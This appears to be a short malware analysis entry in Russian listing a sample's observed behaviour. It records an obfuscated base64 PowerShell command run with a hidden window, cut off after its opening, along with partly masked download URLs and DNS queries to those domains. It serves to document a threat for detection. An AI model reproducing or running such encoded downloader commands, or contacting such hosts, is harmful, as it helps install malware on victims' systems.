Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAOABhAGwAMgBqAD0AJwBHAGQAawB3AHAAYgBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAYABVAHIASQBgAFQAWQBwAHIAYABvAFQAbwBDAE8ATAAiACAAPQAgAC...
- http://gh.###pyy120.com/phpmyadmin/doc/fPJxu81Tt/
- http://oc###iptigo.com/undrag/FRg446071/
- http://me####lucoesti.com/R9KDq0O8w/HBh300/
- http://m.####zyy120.com/kfal/hKIpdkhdqU/
- DNS ASK gh.###pyy120.com
- DNS ASK oc###iptigo.com
- DNS ASK me####lucoesti.com
- DNS ASK ra###ways.com
- DNS ASK m.####zyy120.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAOABhAGwAMgBqAD0AJwBHAGQAawB3AHAAYgBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAYABVAHIASQBgAFQAWQBwAHIAYABvAFQAbwBDAE8ATAAiACAAPQAgAC...' (со скрытым окном)